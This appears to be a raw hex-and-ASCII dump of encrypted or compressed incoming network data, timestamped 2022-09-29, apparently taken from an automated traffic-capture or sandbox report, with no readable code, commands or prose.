                                                                                                                                                    2022-09-29 12:59:08 UTC13058INData Raw: 76 aa da 7c 58 ed 5b 84 93 74 33 e9 f2 6a a8 ed 78 9e c2 cc b0 81 97 5f d4 45 1b 16 98 08 51 4a fb 92 10 3f 59 a1 1a 38 c3 15 2c e3 dd 09 18 90 32 0c 66 e0 7a f9 9b 73 95 23 7f ec 1d c0 82 c0 fa 3b 8f 88 d4 b8 fc 4c 64 c6 e9 aa e1 e3 d1 a1 13 2d f1 40 68 f1 da 8a a0 90 c8 d3 96 17 12 ec ba 94 68 d6 7b 62 d2 c2 54 44 8f a3 41 10 3a c3 8b 0e bc 1c d7 c8 a1 f8 bd 83 60 49 f8 d5 98 fe da dd 5b 66 0f 45 f2 30 83 ac 2c df ff 0a 39 56 b1 e7 58 35 45 23 6f 53 02 78 62 db fd 21 95 4d 84 7b b0 cd 14 5b 7f 1f 30 c3 35 54 a5 b3 20 3b c5 af 3e 6e 39 1d 30 9c 11 32 ba 20 93 04 0b df 54 23 7c 22 f2 d5 59 00 35 a5 7c 79 94 25 48 58 52 8f 0e 0d 7a 03 d5 0e 61 87 be 1e dc 60 e8 49 8d ef 3f a5 79 b4 80 ce 84 c4 50 de 55 33 70 c0 ab 52 9a 41 f8 31 ac 24 02 8b 0d 58 99 ec 5c
                                                                                                                                                    Data Ascii: v|X[t3jx_EQJ?Y8,2fzs#;Ld-@hh{bTDA:`I[fE0,9VX5E#oSxb!M{[05T ;>n902 T#|"Y5|y%HXRza`I?yPU3pRA1$X\
                                                                                                                                                    2022-09-29 12:59:08 UTC13074INData Raw: 3d 7e 8c 17 e0 fa bf 98 d6 7b 33 e1 d7 79 67 2b ea c4 54 7d 53 f1 e2 7e fe db 46 40 ef c4 8f c6 1c 07 92 25 db f5 24 ce 0e 66 d1 c0 f5 d8 72 54 a4 bc a0 31 28 88 b9 60 7f e3 3a 14 5a f4 d5 ca 52 12 08 1a ba 43 b8 b9 29 f5 f7 f8 6b 0c 60 39 7e f2 8f 1b ac 03 9e ef 3a 07 fb 31 47 35 2a 1b 14 5c 57 ec ac 93 e6 da c2 81 40 84 3e c5 ef 64 1d 05 0b 03 1d d1 d5 54 82 f6 c7 22 05 69 cd e9 1d 37 3f a6 a0 93 6d b8 30 7b 2b e1 0c ce 4f ac 19 95 25 9d a8 b3 7d 20 56 1f a2 43 b3 0d f2 23 cf ac 6a 2b 69 ed 2a 0e be 99 65 33 84 2b a8 01 fd 50 db 3e 69 f1 36 ce c3 40 81 a8 00 67 f8 55 de f9 7c 69 28 25 77 3b 28 3f 79 8c 51 8f e1 64 0d f9 a9 2b 16 f0 9f 50 a9 8b 0f c9 49 4c 34 9f e4 42 9e 4f 0b 91 38 ef 1a 18 3e 17 5b 55 eb 04 e7 33 f8 3d 72 27 0c 20 f9 e8 00 96 95 8f d5
                                                                                                                                                    Data Ascii: =~{3yg+T}S~F@%$frT1(`:ZRC)k`9~:1G5*\W@>dT"i7?m0{+O%} VC#j+i*e3+P>i6@gU|i(%w;(?yQd+PIL4BO8>[U3=r'
                                                                                                                                                    2022-09-29 12:59:08 UTC13090INData Raw: 75 df f9 71 f8 33 a7 d0 83 0a 29 48 b0 27 08 1c ac 54 6d f1 ab 1f bd 5e 00 81 8d 3d e7 10 e7 27 69 ec 77 30 4b 3a e7 f8 5e 81 d7 fb b7 94 b4 14 a1 e5 cb ba 1c 0d cf 22 7b d1 9c ee 10 37 0a 27 90 f4 fa fd 28 56 72 18 f4 d9 d6 f0 2d 52 bb 83 ca 25 c1 b0 51 f2 21 e3 dd aa 84 d3 2f ef 4d bd d3 b3 07 f8 58 3e 15 92 d8 71 e9 72 d3 16 ab 2d 25 ff 30 2a a1 24 8b e0 a8 0b 40 8c f8 37 96 ed b1 30 a0 90 07 32 cb 2c 08 cb ce b5 28 c9 9b 54 a4 76 da 99 a1 1b bf 1e cf df 44 d1 25 28 bd 85 6c ee 9d 99 3f 69 5a 59 94 be 5e b9 fd 82 8c ed f4 c2 4c be 5d 0e c5 1e 14 d7 02 ea e6 25 4d e9 03 19 e5 d7 48 4e 64 9d e7 8e a8 d6 96 5d 7b e0 c3 8b 48 56 5c 8f 86 6b dd 91 a6 67 7f 34 31 63 ab 83 84 11 43 7c c9 a8 31 50 90 00 d6 9b db 8f 1c 02 cb 43 99 c8 3f c7 b6 0f ad 79 68 65 4e
                                                                                                                                                    Data Ascii: uq3)H'Tm^='iw0K:^"{7'(Vr-R%Q!/MX>qr-%0*$@702,(TvD%(l?iZY^L]%MHNd]{HV\kg41cC|1PC?yheN
                                                                                                                                                    2022-09-29 12:59:08 UTC13106INData Raw: 34 3c f7 61 ec c1 d3 a5 03 bd 09 1b 5c 44 97 f1 42 f7 be 54 b1 ca 90 33 60 46 cb 3d 75 b6 26 2a 5b 77 08 f3 6e cd 86 da a8 c2 68 1e 24 0b b6 94 7f 11 5a 3d 77 5a 2d d4 b4 55 a8 57 04 9b 0c e8 76 74 5e a4 56 52 e6 d8 04 b8 17 d5 72 b6 e4 a6 10 fb 70 3c 6e 4e 40 b3 04 15 60 96 66 bb 7d b8 0e c4 48 c5 6a 46 f3 9a fb 02 0b a5 76 33 23 b3 07 5b f1 72 73 05 d6 3c 1d 68 d1 28 48 26 af ab e4 3b 26 c6 ab 2f 45 97 0b 56 75 cf ce 6c 96 de 41 c7 7c d0 d7 22 c5 7d f7 20 b5 b9 74 f1 c9 be 2f 63 97 34 24 99 12 2b b2 b0 40 63 c5 60 f6 33 a9 ba 80 cb 36 32 34 a1 0d fe ed fd f4 40 75 39 da 46 c1 0e de 5b b8 c6 7c fc 60 bf 02 2c 49 0d 56 b7 64 4a ba 30 9b df e9 ac 59 3c e3 8c bf 79 23 b7 68 71 78 c2 45 78 1a 56 ea 4f 4c d6 0d 09 8e 53 7c ac 92 a6 7d d4 fb 34 b3 4a f8 04 4e
                                                                                                                                                    Data Ascii: 4<a\DBT3`F=u&*[wnh$Z=wZ-UWvt^VRrp<nN@`f}HjFv3#[rs<h(H&;&/EVulA|"} t/c4$+@c`3624@u9F[|`,IVdJ0Y<y#hqxExVOLS|}4JN
                                                                                                                                                    2022-09-29 12:59:08 UTC13122INData Raw: 3d a6 b2 74 b5 ad 78 04 ec 0e 07 0e 51 4f 54 cc e5 04 9f 09 73 d7 f3 28 24 b9 ef 48 42 4e 70 26 a7 cc 64 dd d6 ae 6e 05 4f 64 54 2a 2b 72 aa ed b6 71 b8 a3 11 af f5 9d 10 6f b1 6c 29 38 92 10 90 52 a0 00 bc 7e 8f fd 9f 24 66 4d ff 39 6a f4 99 43 75 c1 04 d1 45 97 35 83 f4 35 72 90 a8 06 1c ca ba aa 8d e8 65 d0 03 a8 91 a1 c6 da 8a aa d2 ab 77 8c 24 67 a8 ab ee f7 06 a4 08 a8 0b 81 d0 8a 18 af 20 a8 24 87 26 1b 32 2d 84 df f0 68 4e bd df b5 fe 18 8f f5 a3 95 8a ca cf 6c 36 9e f5 f6 e1 1e 5f ea 38 62 f4 42 09 d8 20 f2 d3 cb 65 71 65 4e 1e 80 2e b1 3a 57 4f a2 83 1f 99 7c 6b 2b a7 95 de 2e 3e c9 ea 2d b1 4d 80 6f cf cd f5 f8 51 c3 b7 18 11 2d 1a b9 37 40 65 a8 ca 87 a8 88 87 fd 4d 3b e6 29 61 b3 b0 73 17 c4 26 4d e8 12 6d 02 db d5 e5 0c 6d 5a 18 66 42 5f 78
                                                                                                                                                    Data Ascii: =txQOTs($HBNp&dnOdT*+rqol)8R~$fM9jCuE55rew$g $&2-hNl6_8bB eqeN.:WO|k+.>-MoQ-7@eM;)as&MmmZfB_x
                                                                                                                                                    2022-09-29 12:59:08 UTC13138INData Raw: b6 50 11 de 2b 53 64 7c a4 1b 70 bd 2c f9 fe 13 00 45 a5 2c c9 59 cb 6a 3d 89 12 e4 a1 b2 8b 83 91 2c 78 6f 77 d8 1e 04 44 93 27 85 ca cb c8 7e 8b d8 7e 6e 2e 8d 56 8d 88 08 66 88 66 4e a5 b0 29 6f 06 97 eb e5 31 64 f7 77 b5 4a df 6e 6a 3c 7f bd f8 04 f3 d7 7f 85 33 ab f8 0e 94 8f d2 6e 08 22 2c 55 b0 b1 20 43 3e 17 b9 de 6f cc 59 3b 70 74 4a 84 a7 8b 8b 44 fd b4 c1 0d 74 fd 2c 23 e4 92 73 41 b5 ec a0 0e b4 a4 b0 ad 0f 94 18 05 a0 a0 65 b3 6e 42 9b 74 2e 43 34 df 4d 8e 28 f1 03 75 04 17 a7 35 f0 a0 93 c5 3f 76 63 a3 ef c5 d6 0a 45 08 c7 1a e8 ed 11 c3 a1 6f 33 71 f6 49 46 b3 2d 9a 62 b9 9d 68 73 bd 29 9f a4 59 c5 08 d3 f3 92 5a f9 9b 98 58 4c 12 df 5d 57 44 85 8d aa 23 74 f7 e7 ee c1 34 a6 b3 c2 ad 3d c1 6a 82 a7 ac 30 9b 94 16 ea 93 99 db 3f e8 e2 ec f5
                                                                                                                                                    Data Ascii: P+Sd|p,E,Yj=,xowD'~~n.VffN)o1dwJnj<3n",U C>oY;ptJDt,#sAenBt.C4M(u5?vcEo3qIF-bhs)YZXL]WD#t4=j0?
                                                                                                                                                    2022-09-29 12:59:08 UTC13154INData Raw: 0a 40 57 6f 60 d0 80 3e 08 db 2f b0 78 dd 1f 32 fc 02 61 32 89 2a 27 3e 85 f8 b7 0e 23 8c ba 75 26 ca 16 49 a6 da 85 79 92 7d 92 2f a6 9e 59 6c 8b 60 ba 23 70 d8 e9 54 7b d2 f3 2d 4b b5 21 b2 3c 61 d8 5d f4 51 7b f0 69 3e 52 65 f5 42 43 4e 5c 7a 69 f4 fd de 95 fc 27 16 7e 2f c4 18 ac 99 85 71 4d 7d fe 81 11 dd 94 d1 a8 d9 51 08 9b e7 6b a5 63 04 7b df 00 7b 31 18 4c b4 f3 a2 8b 5e 99 be 03 2d 7f 59 9b cd 3b 9c a3 65 04 b4 91 63 5b 34 d2 f3 28 9b e3 28 2d d6 e2 70 19 68 07 94 4c 1d fa ca 6c 29 67 0c a7 5f 01 ef 89 36 ef c3 95 b1 d7 a4 9e 99 4b f2 94 42 69 b9 2e 70 37 03 15 fc 7a 69 0f db 00 fe 5d 07 2e 3c e6 e1 6a 79 a2 f0 3e 3d 13 35 90 ec 80 43 61 cb 89 99 f2 24 76 b3 e2 56 73 86 13 3a 27 aa 21 3e 77 40 b1 40 ad 10 f0 90 7a 45 fe 2b c1 d0 ea 2c 5c 4f 6c
                                                                                                                                                    Data Ascii: @Wo`>/x2a2*'>#u&Iy}/Yl`#pT{-K!<a]Q{i>ReBCN\zi'~/qM}Qkc{{1L^-Y;ec[4((-phLl)g_6KBi.p7zi].<jy>=5Ca$vVs:'!>w@@zE+,\Ol
                                                                                                                                                    2022-09-29 12:59:08 UTC13170INData Raw: 28 52 38 3d 0b 8c e3 29 3b 1f f9 42 26 55 27 8a b8 cc cb 88 77 20 73 c8 9b 01 1e a3 86 c7 3d 0d 49 ff ea 7f a6 08 34 91 5f 82 5b df 7e 7e f7 3b 5f 9d 46 21 3a ec c7 cc 1b 56 5b 14 11 87 53 97 bd 55 7b b3 98 17 0e 98 5e 9b 8d 08 f7 71 f6 7b 48 7d 7c 7a 45 48 b7 80 2f af 9c 79 04 a6 33 9c fd 2b fe 9e 1e 65 58 98 87 88 c0 bf c8 69 99 f5 67 b0 d2 5f e3 d4 70 86 ec 9b 41 a5 de 3d e1 6c 1e 1f c4 22 f8 13 6a 0d 8e 74 72 67 2a ce 97 74 c7 69 81 5a e8 fa 7d f9 f6 29 b8 ea a3 99 c8 4f 66 d8 ad 85 07 71 20 49 1e d0 33 ec 30 89 b9 56 2b 66 c1 2a 9f 95 77 72 ad e0 71 90 d3 0a 16 13 c8 20 29 46 b0 c8 9e d8 9c 8d 47 d0 0a cf 38 70 5c ad 23 cc 4c 55 6f df bc 39 19 13 30 fe 38 4f 7f bb f3 78 4c 88 ea bb c3 d5 4b 14 c2 e5 7c 2b 0c e8 93 59 3d 71 88 92 f7 af 52 2e d5 ea 94
                                                                                                                                                    Data Ascii: (R8=);B&U'w s=I4_[~~;_F!:V[SU{^q{H}|zEH/y3+eXig_pA=l"jtrg*tiZ})Ofq I30V+f*wrq )FG8p\#LUo908OxLK|+Y=qR.
                                                                                                                                                    2022-09-29 12:59:08 UTC13186INData Raw: 9b 77 58 c5 15 e5 cd 3e aa 15 7d 4a ec 5c e0 3b 83 2c 38 8e 55 57 ba 1f f1 8a 43 3c 99 16 7f 46 b8 72 4a 65 43 6c f4 c6 b8 97 3c 35 8f 77 14 ff bf c2 21 9a 98 2d dc 77 d6 d8 a4 a2 3f 35 e3 78 9a 47 b9 e6 6c a1 b7 e9 fa 56 e6 03 17 94 03 82 2d 71 14 61 bb 99 75 73 a3 9d 78 af c2 11 0d 54 56 eb bd 8e bd 4c 74 8c c4 c7 7d fc 6c 81 81 27 92 ee 67 7f 47 36 99 26 ee 62 08 86 6b 15 76 4c cb dc ab b9 97 14 6d b6 0a 5e 12 0f 64 75 eb 9e 72 d8 01 b2 7a 99 8b 20 39 02 ff f5 c6 b5 b8 7c bc 3c 4b 6a 7f 57 54 55 97 eb c8 cb 40 fb a9 6e 46 74 02 36 51 5d 78 88 7f be b3 57 10 c1 98 8c ee 30 0d ef 99 87 d0 24 b0 36 8e 69 21 8f c7 68 a1 8b a9 cf f9 b5 d7 7f a9 0f 8b ee eb 40 11 2a 1f 6d 36 91 ee 70 aa 48 bd 7f 74 04 d9 05 62 01 91 8e ae 2d d2 c9 66 2a 90 39 63 e8 30 b0 05
                                                                                                                                                    Data Ascii: wX>}J\;,8UWC<FrJeCl<5w!-w?5xGlV-qausxTVLt}l'gG6&bkvLm^durz 9|<KjWTU@nFt6Q]xW0$6i!h@*m6pHtb-f*9c0
                                                                                                                                                    2022-09-29 12:59:08 UTC13202INData Raw: 13 84 fd a2 19 86 e4 61 ef 63 fb 3f d1 c5 89 6c f2 12 67 02 74 75 64 07 5d 89 b3 ee e4 dd 31 c2 95 07 4e 4c 17 32 96 62 af e0 82 a8 eb 3a f5 d1 dd f1 ee 1e a3 13 30 1a 64 1e e4 61 e5 13 21 62 65 50 cd c8 3b b7 3b bf 56 0d 76 30 8e 4f 38 17 e5 e2 00 24 dc 69 ba 7d c7 58 44 e7 3c 58 62 95 11 cf 4f b3 45 a0 79 1b 02 82 66 80 42 ab d3 86 b7 71 62 e4 2c e3 20 f0 a7 20 c0 96 8d 7a 27 bd 2d 5d 16 34 c5 64 d9 a0 75 09 00 f2 8c e5 4e df ab 57 45 d4 c5 86 7d f0 0e 21 3f 61 61 12 82 5a 72 bb 4e 70 f6 07 5f 50 0e eb 2a c8 11 38 e1 be 20 04 da e9 24 c2 2f 2a 90 62 84 02 46 9c 33 4a 70 d8 8a c8 0b b2 53 67 a0 ae 76 3b 8a 39 79 d6 b8 61 84 fd 30 91 52 e9 94 23 0c da ee 05 6c 91 96 f3 29 c2 71 64 50 b1 29 2e d8 85 71 e0 39 f3 3f 51 58 b6 b6 27 a3 29 24 82 9e 79 1b 17 82
                                                                                                                                                    Data Ascii: ac?lgtud]1NL2b:0da!beP;;Vv0O8$i}XD<XbOEyfBqb, z'-]4duNWE}!?aaZrNp_P*8 $/*bF3JpSgv;9ya0R#l)qdP).q9?QX')$y
                                                                                                                                                    2022-09-29 12:59:08 UTC13218INData Raw: 60 41 2e e8 80 b0 74 0d 1b c1 af 92 9c 96 6e 7b 77 77 37 8e 3f f3 4f b9 24 63 30 71 88 9e 94 0c 73 c8 af 81 23 a3 5c 6e 91 97 fc 36 c0 2e 38 ee 09 62 23 49 98 85 0e 71 f5 24 88 6f 29 06 a0 c7 a0 de e0 49 55 fb e8 dc b8 8c 21 2f 87 c9 b7 32 e7 b2 28 24 f1 0b bc f0 da f6 25 71 74 f3 ad a1 4a a9 71 f6 5e a8 2f ec e0 20 cb 9b 88 3e 17 ff 51 90 99 7f 28 dd ff ca e4 3d 4d f8 8c ee b9 1a 02 e9 e7 20 fe 29 c0 c3 b8 9f 4b 89 0e d3 11 52 62 8d 0c ca 2a fb ef 5a 61 e8 96 9e 3a d0 8f db 63 ea 96 92 84 09 35 d3 bd da a7 4b 3c c2 ee 20 73 74 5b af 28 2a 5f c8 3c 14 c3 eb 47 8d 8c e4 2f 4b 85 e6 ce 3f 25 24 88 84 6f 9e a5 87 0d cb 3e 5a cd be e7 eb 04 1b 3e 00 eb cf 2a 51 df e3 e7 78 8c 98 ce 7d 65 e3 f7 63 a3 1d 94 7c 35 7d fb 80 ac 59 98 e9 48 f7 f9 70 a3 18 ee c9 09
                                                                                                                                                    Data Ascii: `A.tn{ww7?O$c0qs#\n6.8b#Iq$o)IU!/2($%qtJq^/ >Q(=M )KRb*Za:c5K< st[(*_<G/K?%$o>Z>*Qx}ec|5}YHp
                                                                                                                                                    2022-09-29 12:59:08 UTC13234INData Raw: 56 35 65 d6 40 c8 ee 99 81 51 4a 8e d7 b4 0c e1 fe f7 a3 14 c6 df 5f b4 53 fa 7e 81 f7 1e 5c c8 2b 2c 44 e3 81 a3 6d 0c ca df e0 f5 2e 38 1d f4 45 0b e4 b4 f5 4f 15 70 93 7d 87 75 e0 2c e2 f3 d3 70 9f 25 d2 68 1f 00 7f 1a 61 f1 dc 9c d9 6a 00 43 fd 9c b9 01 c5 67 01 5e 59 6e 49 41 2f 57 44 5a c9 01 5f 8d 16 14 22 b3 5b a8 4e b0 77 17 b5 7e 25 d1 15 31 cc 24 ee 4d 70 27 df 2a c1 3e 27 94 8e da 9d fb b4 58 33 ca 7b a5 57 b3 1f a8 94 59 f1 ac d4 71 32 d3 51 d8 e4 4f bd 6f 09 f4 17 a2 37 ab ec 7b b2 05 ca 07 6b e9 6c 21 85 61 32 41 27 02 fe de b6 10 c8 3a 95 57 00 05 e1 50 8a cf 3f d0 f2 e8 bf f2 db d4 7f be 48 47 78 31 09 28 2d b3 bf 66 30 45 41 a8 be 10 e4 d3 5a b6 0d 9f 6b 39 02 3f cb 2d 78 a8 f1 8e ed 48 59 86 86 61 f5 77 03 8a 59 cf 45 6f db 28 8b 6f 4a
                                                                                                                                                    Data Ascii: V5e@QJ_S~\+,Dm.8EOp}u,p%hajCg^YnIA/WDZ_"[Nw~%1$Mp'*>'X3{WYq2QOo7{kl!a2A':WP?HGx1(-f0EAZk9?-xHYawYEo(oJ
                                                                                                                                                    2022-09-29 12:59:08 UTC13250INData Raw: 06 4f d7 0d 37 58 60 bf 97 28 d1 1f ef c2 27 d1 a6 d8 7d 85 38 0e 80 42 fc 34 9d a1 33 43 f8 59 3c a7 be 41 a8 d3 ad 4c 11 08 84 f0 b9 ba 43 41 19 6f 15 97 6d 1e 71 78 f8 be c0 f9 c1 73 5e b8 3e 47 2e 71 f5 f4 97 59 7e 68 51 02 01 97 21 59 78 b0 5f 49 4c c5 b5 65 40 e8 b3 38 3e 0e 8b d1 ab 96 41 eb 16 a7 b0 f4 f2 99 be f6 6a 31 d6 2a 29 29 61 b8 b4 bb 8f 59 da 48 7e e7 30 9d 9b ee 4c 39 d5 c0 09 08 0d fb 0f dc 89 39 06 01 c9 17 9c 08 d3 a2 6a 1d ea dc c2 13 d7 11 ad 76 18 ba 92 ee 9a 00 3f a4 ce 9b 3a 1d 94 7a 1b 6a b2 92 d1 c7 d2 7c 28 d6 86 25 8b 92 91 74 29 1b 4c f6 76 50 2a a5 1d f4 a5 91 ee 99 74 18 3a 38 21 db 51 65 53 97 86 88 be cb bf 67 64 c6 02 69 e4 9d 39 2a a9 e2 3b c8 4d b9 6c 46 ca 4d 4e 02 44 98 5a c2 94 38 a9 c5 80 96 86 88 54 8a b7 5e f3
                                                                                                                                                    Data Ascii: O7X`('}8B43CY<ALCAomqxs^>G.qY~hQ!Yx_ILe@8>Aj1*))aYH~0L99jv?:zj|(%t)LvP*t:8!QeSgdi9*;MlFMNDZ8T^
                                                                                                                                                    2022-09-29 12:59:08 UTC13266INData Raw: d2 b4 6a 4b 51 b0 e5 42 bf ad 22 a0 c4 74 21 49 74 af 9a 33 35 e7 24 3b 3f f4 c4 fa 52 2e f4 22 a9 91 aa 97 80 dc 01 d6 87 eb 39 e0 75 e6 22 85 92 7c 07 2d 8a c9 2b ba 88 ff 9a e7 fd 40 05 c8 fe bd 2b 81 da 86 b4 0a 5c 62 5b 6c 70 74 b8 b9 2e 41 d7 da 5f 8f f2 07 9a d7 d9 8b ba 76 8c 7a 16 8e 70 f4 4e 44 9a 29 d2 94 27 53 f9 03 a4 4d af 3b 40 56 bf 87 ee ad dd 7c 71 78 22 e9 5f 2f 0d cb af bb cd 3a 20 d0 d6 42 b8 6f 19 21 9a 0a 9c 6d 17 c0 19 b4 20 af a4 df e3 75 1f ad aa 73 23 8f 0c c9 d3 40 59 bb 10 99 ef 48 56 a9 97 18 f5 27 af a5 ce cc ed aa f2 2e 66 5f 67 85 f3 90 cd 5e 5f 35 1a 76 2d 42 1b 01 9f 1a 3f a8 ac 57 7a 93 61 b2 9b b2 5d fe 5e 5a 41 9e e9 76 1b 55 9f 1e ac c8 ef 32 2c cf 90 50 3b 22 43 8d 05 6e 54 68 08 32 9d 78 18 a0 0e dc e1 d5 91 46 e4
                                                                                                                                                    Data Ascii: jKQB"t!It35$;?R."9u"|-+@+\b[lpt.A_vzpND)'SM;@V|qx"_/: Bo!m us#@YHV'.f_g^_5v-B?Wza]^ZAvU2,P;"CnTh2xF
                                                                                                                                                    2022-09-29 12:59:08 UTC13282INData Raw: ad 77 ed 80 00 98 07 2c 63 07 1d a0 7f 3b c1 3c ff 76 40 e2 53 ea 7c fc f9 10 21 78 78 a0 a4 2b 65 2e c0 99 d2 aa fd d8 f4 cc b3 75 56 b7 9e 6e fe 36 ea 11 4f e0 80 35 4e 04 e1 74 17 5d 13 4d c2 6c f0 00 f4 c0 7d e1 f0 75 86 0c df 4b 30 bc fa 18 e3 20 06 bb db e5 19 51 38 1f 2a f4 38 fb 60 e5 3f 00 87 99 14 f0 b1 08 66 9a b1 72 50 da bf 5b 79 a8 9d 50 f6 e7 f9 9a 7d 14 c0 8c 18 83 52 1b ed c3 24 9f 01 e6 bd 0f 51 64 ed e0 5d 8b e4 89 ee 11 7e c5 a4 cd 4d 47 aa db 0e 82 2f dd 98 c8 5b b5 1e aa 00 eb 61 78 50 ad 38 61 69 fd 05 b6 a5 ac d8 e9 7d 86 af 7d 08 be 50 9c 06 78 ec 1c a5 b6 fd 0a 98 6c e5 14 9a a3 bf 86 8e 93 69 c7 5b 9b 5f 73 23 cc 05 3d 8b f7 06 17 3a f8 e7 5c 42 ac 92 22 a7 d5 3c fb d4 10 4f 37 c0 ba 38 fc 8b 00 38 0a 89 e7 ae a4 38 fe a2 d5 3c
                                                                                                                                                    Data Ascii: w,c;<v@S|!xx+e.uVn6O5Nt]Ml}uK0 Q8*8`?frP[yP}R$Qd]~MG/[axP8ai}}Pxli[_s#=:\B"<O7888<
                                                                                                                                                    2022-09-29 12:59:08 UTC13298INData Raw: 00 9f 0a 79 41 3d 5d 0f 77 64 55 df 2d f2 05 c7 5e bd 02 38 dc 64 d5 4e a5 54 52 34 52 79 e1 38 74 e4 9d d7 ea 74 38 8a 41 27 bb 8f 2e 92 2e f5 94 87 92 c1 c5 63 ba d7 d0 e7 8e 48 7b 94 59 7a 34 1d c4 65 b2 73 9d c2 4b 2f 26 dc ae 44 9e 39 13 3d bc 09 2b 81 63 8f 00 ac 65 64 75 b2 ab 75 22 9e 72 84 c5 27 57 e0 94 64 d0 5d b5 53 6f 48 80 d1 f4 0a 02 f1 c7 b7 4f e6 fb 01 0f 1b 95 56 f5 de 88 b2 c9 f5 e7 0f 96 3c 8c c2 23 3f 50 e4 45 6f 16 6f d5 aa 0e 4b a5 26 0d 91 a6 c0 a7 4a 87 59 e8 b8 dc a3 c8 6e 6d 27 46 0f 8b 6e 9f 74 d6 26 06 9c d1 a3 b0 9d 38 6b 0b 5d 60 49 38 13 22 5a a5 d4 1c 03 fd 4f 6d 15 ce 3f 97 59 25 7f a6 9b 1c 02 1c c5 50 c2 48 8b 25 ea 73 d7 4f 34 f5 21 6f 15 78 3c 66 f8 3f 90 25 62 5a 58 5c a5 2f 72 9c b3 24 7c b6 9a 00 62 a4 8e bc 37 1b
                                                                                                                                                    Data Ascii: yA=]wdU-^8dNTR4Ry8tt8A'..cH{Yz4esK/&D9=+ceduu"r'Wd]SoHOV<#?PEooK&JYnm'Fnt&8k]`I8"ZOm?Y%PH%sO4!ox<f?%bZX\/r$|b7
                                                                                                                                                    2022-09-29 12:59:08 UTC13314INData Raw: e5 f4 03 02 2d 04 45 87 4d 17 68 64 66 59 6b 23 e3 f9 31 e0 fa 80 8b 4d 29 f0 ab df 38 06 33 46 d9 8a e1 0c e3 74 f9 94 eb f5 98 96 f6 e4 88 8a 11 7c 42 05 e3 4c 27 26 60 be 0f 10 94 91 35 6b 3c 3a 03 dc 04 19 8e 69 f3 e3 f6 cf af e4 d9 42 28 25 4b 9f 13 94 36 3f c6 75 96 ac e5 41 b4 ea 4d 85 aa fd 0e 9b 15 58 45 8d 0a f8 73 7c a5 6d ec bc d2 c1 70 af 82 52 e9 47 e4 13 a6 94 53 ae aa d2 0b de 8d 54 d4 62 e5 c1 0c d3 23 c7 16 00 b0 f3 46 03 79 e7 37 5a e0 45 0d d3 85 e9 5f 85 19 78 0f 03 f0 20 23 3a 47 ef 0e a1 b7 b0 08 4f 11 d4 8a 90 17 46 b0 2c 7b 7e 8a 2f e5 ba c3 8f 56 8e 29 21 a8 69 29 7d fc a1 fd 8b 99 53 db 2a 1a 6f 33 6c f8 57 0f 32 2e 72 1c 2d 5a 24 d1 e6 aa 83 8b 24 d5 f0 c1 fe fd 30 8c 99 7a 2d 06 ee bc 32 9b 96 34 bd 1c e8 20 1d 06 ec 4b b5 2f
                                                                                                                                                    Data Ascii: -EMhdfYk#1M)83Ft|BL'&`5k<:iB(%K6?uAMXEs|mpRGSTb#Fy7ZE_x #:GOF,{~/V)!i)}S*o3lW2.r-Z$$0z-24 K/
                                                                                                                                                    2022-09-29 12:59:08 UTC13330INData Raw: f5 33 cd 98 43 e0 51 77 f5 07 32 56 c7 9e 31 83 de 7d a4 f0 fb 23 12 02 e7 26 22 70 dd ba 2a 04 38 76 50 f4 19 08 d2 e5 7a c4 fd aa 0b a3 6a 7a 43 cc 7f 36 bd 0d f5 cd c9 5c b7 14 79 a1 46 0d 48 2b 71 66 82 51 4b 6a 45 cf 01 da 8d 01 dc 94 08 65 e0 9f 5b 1d fc 21 ce 72 19 8b 33 84 df 8e c8 71 8b 99 14 fb 9a 85 d7 c2 ba 9c 05 32 6d 5f e5 98 36 eb d0 22 34 df 45 ab 42 19 34 52 b2 69 ef 44 02 3b c4 d1 c8 c2 00 d7 78 5e 5b c5 fb 87 e5 7d 65 3c 9f 03 19 59 96 c6 07 1d 3c fd 74 89 06 9f 25 02 73 a1 64 b9 1c 4c 2b a8 d0 18 5a 38 80 e9 d5 46 32 53 70 10 11 65 cf a8 a5 4f 59 a6 d8 48 e7 14 04 54 4f 6e 1e 38 33 c9 d1 ae e0 13 6e 65 7c 59 09 eb f5 d5 4c 2a 27 75 dd d9 9e eb c5 31 c6 14 d8 e1 25 76 b0 b2 b4 ed c5 98 69 36 bb f2 59 a5 61 69 34 45 3c 3e d7 8f 38 8f c5
                                                                                                                                                    Data Ascii: 3CQw2V1}#&"p*8vPzjzC6\yFH+qfQKjEe[!r3q2m_6"4EB4RiD;x^[}e<Y<t%sdL+Z8F2SpeOYHTOn83ne|YL*'u1%vi6Yai4E<>8
                                                                                                                                                    2022-09-29 12:59:08 UTC13346INData Raw: 41 86 4c d4 2f 94 6d 5b ad cb 47 01 92 d3 fd 18 b6 df ba e3 91 8f b1 82 09 aa 7c fc 75 14 95 7f c2 53 99 b7 02 68 9a 5d 02 42 84 6c f0 5e 91 9b 7d 71 90 f2 91 6e c8 38 4b bb 52 df 66 b6 50 26 a3 2e ab d9 06 f1 8a 2c cc e7 08 55 98 20 a9 a0 b9 bf 39 04 f5 f1 61 bd 1b 13 ce 83 18 f3 a0 af 05 f4 85 73 b1 5a 44 53 43 45 90 9e d6 ad 5b 8c 53 71 7e bf 9c 88 34 46 69 51 31 f8 c2 ac ed 51 1d b8 b3 5c f3 13 2f cc 6c 0f b4 19 32 ee 8e fa 9e 0f f4 93 84 b8 5f 25 a0 0c 65 41 6a a9 31 09 14 c5 e2 c2 40 31 03 60 53 1d c9 e2 de ca 6f fb 00 32 f3 6d 4f d5 0c 6d f8 47 c9 b6 d0 7e 3f f2 ca 9d 9c 8d 92 5c 51 7f 18 e3 f1 49 cf ee 42 23 b9 57 6c 28 60 7d ee 9d ef 25 17 5d f7 4d 2f 58 f7 30 39 f5 ba c2 2a e1 c7 b1 e6 55 1c f7 2b e8 bc e0 8a b2 69 1c ea 1a 48 8b 0e 40 9c c3 d1
                                                                                                                                                    Data Ascii: AL/m[G|uSh]Bl^}qn8KRfP&.,U 9asZDSCE[Sq~4FiQ1Q\/l2_%eAj1@1`So2mOmG~?\QIB#Wl(`}%]M/X09*U+iH@
